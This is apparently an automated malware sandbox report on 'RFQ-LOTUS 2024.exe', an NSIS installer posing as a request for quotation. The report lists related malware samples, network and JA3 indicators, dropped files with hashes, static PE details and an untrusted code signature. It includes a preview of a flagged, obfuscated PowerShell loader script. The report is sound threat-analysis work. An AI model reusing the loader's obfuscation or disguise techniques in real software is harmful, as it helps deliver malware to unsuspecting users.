CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	https://vpassz.xu4nblog.com/	Get hash	malicious	Unknown	Browse	8.213.218.186
	aduLTc2Dny.elf	Get hash	malicious	Mirai	Browse	8.217.144.212
	p67UidesWn.elf	Get hash	malicious	Mirai	Browse	47.254.187.247
	confirmation de cuenta.exe	Get hash	malicious	FormBook, GuLoader	Browse	47.243.134.243
	mcEX8uqMA9.elf	Get hash	malicious	Mirai	Browse	47.91.26.160
	JdlqBuKl3n.elf	Get hash	malicious	Mirai	Browse	8.217.192.112
	https://vpassz.xu4nblog.com/	Get hash	malicious	Unknown	Browse	8.213.218.186
	FV- 12.429#U00a0TUSOCAL.exe	Get hash	malicious	FormBook, GuLoader	Browse	47.243.134.243
	FV- 12.429#U00a0TUSOCAL.exe	Get hash	malicious	FormBook, GuLoader	Browse	47.243.134.243
	PO_La-Tannerie04180240418.bat	Get hash	malicious	FormBook, GuLoader	Browse	47.91.88.207
ONEANDONE-ASBrauerstrasse48DE	00389692222221902.exe	Get hash	malicious	FormBook, GuLoader	Browse	217.160.0.238
	RFQ02212420.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	217.76.128.34
	H0RZizYUEv.elf	Get hash	malicious	Mirai	Browse	212.227.226.131
	PI No. LI-4325.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	217.76.128.34
	TC0931AC.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	87.106.124.241
	pago.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	213.165.67.118
	Barotse.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	213.165.67.102
	biliecrypt.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	213.165.67.118
	NHhH776.exe	Get hash	malicious	FormBook	Browse	217.160.0.185
	https://farmacia-galindo.es/DHL/	Get hash	malicious	Unknown	Browse	93.93.113.152

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	KpiLt01Slj.exe	Get hash	malicious	Unknown	Browse	40.68.123.157
	https://bafybeigjxmg3ulqmytt642sjwzluuvy7s2m2z4xbd4pqokaid5z3upavoi.ipfs.cf-ipfs.com/#mavaz@emfa.pt	Get hash	malicious	HTMLPhisher	Browse	40.68.123.157
	4yFaZU8fhT.exe	Get hash	malicious	RisePro Stealer	Browse	40.68.123.157
	undelivered Messages - Copie.htm	Get hash	malicious	HTMLPhisher	Browse	40.68.123.157
	http://event.strategiedirect.com	Get hash	malicious	Unknown	Browse	40.68.123.157
	8DMUHFukm8.exe	Get hash	malicious	Unknown	Browse	40.68.123.157
	MejqsB9tx9.exe	Get hash	malicious	Amadey	Browse	40.68.123.157
	OUZXNOqKXg.exe	Get hash	malicious	RisePro Stealer	Browse	40.68.123.157
	0BzQNa8hYd.exe	Get hash	malicious	RisePro Stealer	Browse	40.68.123.157
	SecuriteInfo.com.W32.MSIL_Kryptik.KXQ.gen.Eldorado.28696.3484.exe	Get hash	malicious	FormBook	Browse	40.68.123.157
37f463bf4616ecd445d4a1937da06e19	325445263.img	Get hash	malicious	Unknown	Browse	104.21.31.110
	Fact.NaturgyID300S220404024NOPA22442452256676545245PDR2PD04LF.msi	Get hash	malicious	Unknown	Browse	104.21.31.110
	Purchase Order05022024.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.21.31.110
	Notice.xls	Get hash	malicious	Unknown	Browse	104.21.31.110
	JlvRdFpwOD.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	104.21.31.110
	00389692222221902.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.21.31.110
	Evgh. rvs Armenia. 30.04.2024.exe	Get hash	malicious	GuLoader, Remcos	Browse	104.21.31.110
	DATASHEET rfq.exe	Get hash	malicious	GuLoader	Browse	104.21.31.110
	file.exe	Get hash	malicious	Vidar	Browse	104.21.31.110
	SOLICITUD DE PRESUPUESTO.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.21.31.110

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.3316341785168242
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrl:KooCEYhgYEL0In
MD5:	E3FBDF830C295157B8847A5219BEE6AF
SHA1:	99A0EA88A100BBD288CA72F68F76EDBBB4C1A0FA
SHA-256:	789E9B78320C2800438B45A071C358B729F29455E1B53A2BD09F7622A88EEC62
SHA-512:	7A566C36DD49AF4A405916711A3F90C87830671DBD1FBF25167F84C8E60D245B160B948C5AAFFEE0BE03111EE8E67C637C93D0E47D00F572CE079C0CFF74B855
Malicious:	false
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xacbfbf00, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.4221119713457728
Encrypted:	false
SSDEEP:	1536:xSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:xaza/vMUM2Uvz7DO
MD5:	238343DAEF9571A48780C036F6B6A1CD
SHA1:	482CDE0E8BFCDA7CA657E09574EB88911EF2D7DA
SHA-256:	F35B5182C75FAD95824D76B380C10B17B889CF2CC2782E426757713FCDCEBBBF
SHA-512:	50CDD2F0FA44F4D0485CECA4C3716F768BA76DA4F92B91DC7AC587106F2D20C6E577D881BE01B9D750E111CE7E00E2D66DB855ABA51EBA25C36060169CC566D4
Malicious:	false
Preview:	....... .......A.......X\...;...{......................0.!..........{A.9....\|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{.....................................;....\|i.................x...;....\|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07571882773507696
Encrypted:	false
SSDEEP:	3:Ei/KYepNlWjn13a/Ygn/l1allcVO/lnlZMxZNQl:Ei/Kzp3W53qptQOewk
MD5:	99E6C95EEDF33F8C1779F71502A8C5A3
SHA1:	5E1AEDDEC5402B6F031E4EBD460CA0C44E19D414
SHA-256:	A0C730686C02DFBA3698B55D9C2C80BA0C1B6D74A39030F2F9771CFF5A85CF26
SHA-512:	A99B022C22BE69790C66AE5A48EB5A0CEBDE6BE5096B5FB65E25607554F883E883BAD3EC5A3DF61D808B11D41A461AE83640A984B96BB0A641A92AF21A7031E9
Malicious:	false
Preview:	K.......................................;...{..;....\|.......{A..............{A......{A..........{A]................x...;....\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	8003
Entropy (8bit):	4.838950934453595
Encrypted:	false
SSDEEP:	192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
MD5:	4C24412D4F060F4632C0BD68CC9ECB54
SHA1:	3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
SHA-256:	411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
SHA-512:	6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
Malicious:	false
Preview:	PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\27-17zLkR9

Download File

Process:	C:\Windows\SysWOW64\fc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Minken.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	810752
Entropy (8bit):	6.563784407427052
Encrypted:	false
SSDEEP:	12288:RqJ0jaC2dsS4WHc1C8w0VDArIwxtBNR4tNNiSvgUwhbcXeOM:bWm2ECV0rwxtBNinisgUwhbcXa
MD5:	E0360D9D8F69298A258F82881CF980FF
SHA1:	2A56FA9AE0DB6D32489F98AEF68A6AD3EF75AA2B
SHA-256:	D94DE28BE7562E264CA015A2F1F0001744354B15A18551FCC786A5B9C47FB068
SHA-512:	F971D6E4BBD9D52E206454E42160B9EAEF36FE5E6CC0776F256C7430F846396C6A654C437BE847E7F898BFA5DF7D4E5DA216CF86DF650E2E9B3F04040ECDCF89
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 37%, Browse Antivirus: ReversingLabs, Detection: 18%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!@G.@...@...@../Oq..@...@/.J@../Os..@...c...@..+F(..@..Rich.@..........PE..L....c.W.................b....:.....}2............@...........................@...........@..........................................@<.............T...............................................................................................text...Ta.......b.................. ..`.rdata...............f..............@..@.data.....9..........z..............@....ndata........:..........................rsrc.......@<.....................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Minken.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1t1a5bob.t2e.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r04wbpr0.oz2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Keeling\Imblaze\Gorget\Cowpuncher.oml

Download File

Process:	C:\Users\user\Desktop\RFQ-LOTUS 2024.exe
File Type:	data
Category:	dropped
Size (bytes):	134580
Entropy (8bit):	1.0293701375998974
Encrypted:	false
SSDEEP:	768:glXC5uy3LgjkZ223TuaIugejJx1OeeJYW1EON:ioZlgLL
MD5:	C9A2DC60D9AD56E12D96705950C97D4F
SHA1:	463AA3B611FDA4FF7A4E178306CBE43E6BD79295
SHA-256:	3983DDD9D06800A0E202338832B92134D43D6794D7DF718C67D115AFD640B464
SHA-512:	24C6F528F695B5429DD0482EFACE05A0730AE12E35F07FE86AA9BBABA28F4E75D58C4DE7F9EF41F435F50F95D087DA774ADD73E64B32E7FF2CC33C86DFA949CC
Malicious:	false
Preview:	.....{..+.......................................................................................=..............................>....................................................................................g...\|..........................0......R.........................I....................k...................................................................e._.........U................w.......................................................................................................................................................I............io......................................................Vm............................................................................................b........x.....................................I..............8...q....^......................................hC........b......................................................................%................O................................................................................W.

C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Optimummet29\Strelsens.Reg135

Download File

Process:	C:\Users\user\Desktop\RFQ-LOTUS 2024.exe
File Type:	data
Category:	dropped
Size (bytes):	323503
Entropy (8bit):	7.720166132294153
Encrypted:	false
SSDEEP:	6144:j5725d4FhOKTdGCMtDdiYap3hxyG/+FLbGFY73HQ:j578dShOKTVcDd1apD5eyY73w
MD5:	00E823DF0D40FC82004F3EB23CCC337B
SHA1:	3AF83222B014BFF18FBFFC8F12834723F2EDD597
SHA-256:	F4C80EB0967C198E96868DE37602AAD87CA615C3BD2CB69854B51FE423FC50B4
SHA-512:	94F3149DADED1627BB323AAC199DCAF56B71271222A1B1413321C0E11F81433045D104106C496C07A3F77217F40AB56C4D3DA6F144FBC1C8F9302D57A5E5FCD9
Malicious:	false
Preview:	.....gg............!!.........1.......Z.........j.##....}}...N..............KK..........}.^^..A.....&............-.......................................................e....../.............5.......L..^...DD.```.gg......pppp....{.........5.OO.[[[.......^^..5............ll.ddd...""..................................................??????........$$._.h....bb.......xxx.......>>................N........................................>............................______.....................W.HH..K...............................V........X.ZZ..::.............b...........................:::...[.................f.....II...www..............o........}.~..................=....&......"........H.......#.".................$$$.....\..............d.NNN...CCCCC..A....yy.<.....BBB.....#...........hhh.}.. ......t.^^^..........................C..n...........88....zz..........>.........................jj.!!!!!.............................^............9999999...........eee.IIIII...-.............,...........

C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Stewed\eufomane.mul

Download File

Process:	C:\Users\user\Desktop\RFQ-LOTUS 2024.exe
File Type:	data
Category:	dropped
Size (bytes):	343397
Entropy (8bit):	1.028879362220716
Encrypted:	false
SSDEEP:	768:Gobo8CCRnMHxGwUbCYj+Giy/S8+utYv2wtW+IuK6rd2rp9rVIryQJrPSp/psd8SD:cwm2jayzYlM18Szd5Ogt7iZUs
MD5:	9A62884A9C0219C558D4F8094D582673
SHA1:	71F5B03762ACA2EB268D4B63248A3C69A8531395
SHA-256:	E17C9A92159946031E1F6B890B4C9AE1C80C416222E3BD0AE1B8C6B3A4783292
SHA-512:	66D994242B6DCE78B878ED72759048EEC7CDC538CE050DD30A186113E4E25F94AAB146BE480D587084155C98CB4DEBA96E34BD2E9E8FDAE195FDC79E728FCE0A
Malicious:	false
Preview:	........~.......&............................................................................................._..........?............................................(..................................................d.............................................................................;...................................................}.............................................................................:.....................................{..K...................... ....................................................................................*...........................................h.............................. ...........Z......................../..]........w.._..............................................................................................g.................................................................................................=........S........................................................................2.......................

C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Stewed\manifesterede.pap

Download File

Process:	C:\Users\user\Desktop\RFQ-LOTUS 2024.exe
File Type:	DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 33569792.000000
Category:	dropped
Size (bytes):	233804
Entropy (8bit):	1.031741719004733
Encrypted:	false
SSDEEP:	768:P/A8YKdr0dyKNY7RxSsqUX4J6fWKLWaP6GJi7Zil2Dkmk+M8WHtaZwi7jWvrbXPc:7DJ8rkn8uHJ5W
MD5:	0DDBD1DD3B0B35E519F505B379978F73
SHA1:	3C2E3B388037D618E19493C2F722D9C65E12D29A
SHA-256:	0EDAAFB9831E7457BDEFEA5BD2368F7136FF03B1450BD21B55C18D0C14FFE9CC
SHA-512:	E2ACDDDDE5FBBC455D75C49EACFBF37E5493C807C5528F2C48E7EE12AA5F9214467CCE0373DE1A6DDD225B83D2595C521969F46235671DB5B7666FBC825489D4
Malicious:	false
Preview:	.............T.......................................y....................................................=.................~........................................................a.........]..........................?...........................@..............................................................F..................T................................\|...................................................=.....................<...................................................H...................................................................E....................................................................................................R................................t.....u..........................h............x....s...............................................................t...........................................c.......................................l........y.................................................................$.................E..................

C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Superambitiously.Teg

Download File

Process:	C:\Users\user\Desktop\RFQ-LOTUS 2024.exe
File Type:	ASCII text, with very long lines (60524), with no line terminators
Category:	dropped
Size (bytes):	60524
Entropy (8bit):	5.324882357070624
Encrypted:	false
SSDEEP:	1536:M1rCHsgp76zjlukgqFl5e1Mhqd3VaKiu6jLc//Txa9vXcV:srtC8RgqgyY3rEE/gla
MD5:	9B7EE350DC019614466B9F98F60CF64D
SHA1:	C7BFAAB298C00F3AC52E762819D22ADC75A36652
SHA-256:	8F94E4F8ACA89DA5F4B89361664AB4F5B1D03C738394626A2EFCE986079D38D3
SHA-512:	E4FB2CAA269CB96EAF7DB5886A31CF414428D00A4F9B2ABA419E1232DFC0D81E22AD0EE7BA241F69BE20CBE09FBA37F029C91FF6B25C65E0C9C2804EBD5172FE
Malicious:	true
Preview:	$Videreuddannelsesmuligheder=$Glaseritebycter;<#Regnskabsfilers Telefonvsnet Analogteknik Turtleize #><#Konfiskationers Frastder Overflutter #><#Trrelsen Amotions Nitrse semidecadent #><#Plumbet gradienters Diplomatarisk #><#Herminone golo Indlggelse Exorbitant Skiverwood #><#Udlydskonsonant Birkesfrets Entoptoscopic Varighed Translokationens Resat #><#syndserkendelserne Anlaces leveveje #><#Rhibia Fiskerflaaden Ricinium #><#Dumbfounds Laveer Mytilid Dint Udkrammer Uncalculable #><#Annualised Bilvrksted Micromodule outcaroling Natlge Betonarbejderen Streetcar #><#Zoospgia Christabel Klinikfllesskabet Barkes Aburagiri isenkrammet Jingas #><#Nederlagenes Skindende wolverines Frromantiske phyllomorphosis Holidayed #><#ddvande Tillgsbetalingernes Lycium Usynligheds Salgsafgift Ferrel Brabblement #><#Froggy Rummedes Inartful geopolitikers #><#Botonny Cosed Nordafrikas #><#Scatha Katakinetic Generalizeable #><#Crumh Knets Repeats Bltedes Oxygenic #><#Kiddoes Drengestregs Foreshortening Tapuy

C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Tveboplante\Diverged\Syntheme\udelade.txt

Download File

Process:	C:\Users\user\Desktop\RFQ-LOTUS 2024.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	598
Entropy (8bit):	4.282919165039948
Encrypted:	false
SSDEEP:	12:iYqtgdGweAQHnG/R6PhxUOcl2F9LdREh63srsWfnTLJoXTk8livMdin:iPu0PBGZKSrzf3JF3vMgn
MD5:	37711DAC99F0E9EAB660C20D74354F8A
SHA1:	B4DE4129ECA73B8352F0DCD6D465E1FAE4A8ED55
SHA-256:	13845704D16184DDF7D2C7D3AB1E0AE5E57FB75FFB26BCF2AB508C7D351273CC
SHA-512:	9C3882EB2D0B021245D73AFFFBB6D07AAC8C30EC8DD8CC4693954D5C082A555F17CE6F0832B03761F5744FD1A59E8FA133D2665709AA0CE41191CCD3F8D3408F
Malicious:	false
Preview:	bortgik hopsacks klokkefaarenes exobiology shoguns.gldsposters pasteuriseret pubble benediceredes skinklers cynophilic ufornuftigst udregn attacca foghorn tilloeb gussies coleopteral..quiddist unoverpowered josiah millwheel chronogenesis unaction thespiskrrens..sindry decorticate impressionistic tintnings atmosphereful somatogenetic ugeskrift..saboteur uveitic tickings baandvvenes ekstravager hjortetakken slyngelstuernes hjortekalv unshakenness..kroppens frossen taxiflyenes restitutionist undermenneskernes klr slikaspargeser vrdstte straffelov bosiddendes potentialers triolerne prereciting..

C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Vejgrfts\Sulfonering228\Travesty\vermenging.bes

Download File

Process:	C:\Users\user\Desktop\RFQ-LOTUS 2024.exe
File Type:	data
Category:	dropped
Size (bytes):	319056
Entropy (8bit):	1.0272308414553788
Encrypted:	false
SSDEEP:	768:LBMlb0lL33dknuGqcq5FuWi5DUebaWuVFWpj3Mkuke01lyiZbWXAOBUFiCtyiUx0:L6SzvawRky6bPMWTxypl7Bo/l
MD5:	B479FA8008F02CFD41617A23C901B523
SHA1:	7CE5DD1AE675048826856ACC9F6D9F3DDE51E26A
SHA-256:	DE346EC31DD512898A98C98EA979D99322358566B1737D52E59A6721165C57A6
SHA-512:	4142B4FDA356471E6778C6B730FAD4FBFB3B33F612B7DBA627E38A35AC6177F6D55F79928BA3AEDD4A86A33FD61C61FF2906C8AE3FB00432BF4FA74668D0726C
Malicious:	false
Preview:	.........................................................................K....&.........................................................e.............................................................9.........................................................................................................................4........................................................................................@....<...n....................-........................b........f..........................................................................................A..................................................................................................................................................................................................................................................R>...................I.............q..O........................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Chrome Cache Entry: 68

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (9004)
Category:	downloaded
Size (bytes):	9009
Entropy (8bit):	5.769689701852316
Encrypted:	false
SSDEEP:	192:XWhH66660sWdYcVMmqfrrdLmxWa9IcEtxvH3cgj5FZwCnTx/glotyW2B:XWhH66660sWOhmqfrpLQWa8BH3ckhTx+
MD5:	62265E6FA21B1F4A1E3D599FCB66D413
SHA1:	FC1CDC78696708771E7365F8F686CA4430BA6AE5
SHA-256:	BD49B25EEB96FFAE602BD7E00100E1022CB07D2C19CD63B172F5BACDD357633D
SHA-512:	4A5DDCCCF1EC33D1EFF0B376619CDEE354DE11D68A90C4B60E6F8818CA4EF3DF465552273F34F3952980C1F5F6423B330F8E7F65A698E41251403D8ACEA0E3D4
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["nfl draft","f 16 crash holloman afb","jeopardy masters tournament","fubo discovery networks","apple iphone alarms","shelby hewitt","meena alexander poems","nba boston celtics"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"google:entityinfo":"Cg0vZy8xMXNmNWo2eTluEiVKZW9wYXJkeSEgTWFzdGVycyDigJQgVGVsZXZpc2lvbiBzaG93MscTZGF0YTppbWFnZS9qcGVnO2Jhc2U2NCwvOWovNEFBUVNrWkpSZ0FCQVFBQUFRQUJBQUQvMndDRUFBa0dCd2dIQmdrSUJ3Z0tDZ2tMRFJZUERRd01EUnNVRlJBV0lCMGlJaUFkSHg4a0tEUXNKQ1l4Sng4ZkxUMHRNVFUzT2pvNkl5cy9SRDg0UXpRNU9qY0JDZ29LRFF3TkdnOFBHamNsSHlVM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOLy9BQUJFSUFFQUFRQU1CSWdBQ0VRRURFUUgveEFBYkFBQUNBd0VCQVFBQUFBQUFBQUFBQUFBRkJnTUVCd0lCQVAvRUFEWVFBQUVEQXdNQ0JBUUVCQWNBQUFBQUFBRUNBeEVFQlNFQUVqRUdRUk1pVVhFVVlZR1JCeFV5b2NIQzBmRUlJeVFsUXFLeC84UUFHUUVCQUFNQkFRQUFBQUFBQUFBQUFB

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	6.563784407427052
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	RFQ-LOTUS 2024.exe
File size:	810'752 bytes
MD5:	e0360d9d8f69298a258f82881cf980ff
SHA1:	2a56fa9ae0db6d32489f98aef68a6ad3ef75aa2b
SHA256:	d94de28be7562e264ca015a2f1f0001744354b15a18551fcc786a5b9c47fb068
SHA512:	f971d6e4bbd9d52e206454e42160b9eaef36fe5e6cc0776f256c7430f846396c6a654c437be847e7f898bfa5df7d4e5da216cf86df650e2e9b3f04040ecdcf89
SSDEEP:	12288:RqJ0jaC2dsS4WHc1C8w0VDArIwxtBNR4tNNiSvgUwhbcXeOM:bWm2ECV0rwxtBNinisgUwhbcXa
TLSH:	5B05F126AB6BF805D02DA9FD7863DA480A7D9DC03D1EFE3253E579FD59B86802807107
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!@G.@...@...@../Oq..@...@/.J@../Os..@...c...@..+F(..@..Rich.@..........PE..L....c.W.................b....:.....}2............@

File Icon


Icon Hash:	831d7efd31371e08

Static PE Info

General

Entrypoint:	0x40327d
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x57956383 [Mon Jul 25 00:55:31 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e2a592076b17ef8bfb48b7e03965a3fc

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=Diversifikationerne@sandstrandene.tem, O=Venstredrejningens, OU="Underoverskrift Citrater ", CN=Venstredrejningens, L=Toulouse, S=Occitanie, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	02/02/2024 08:58:32 01/02/2027 08:58:32
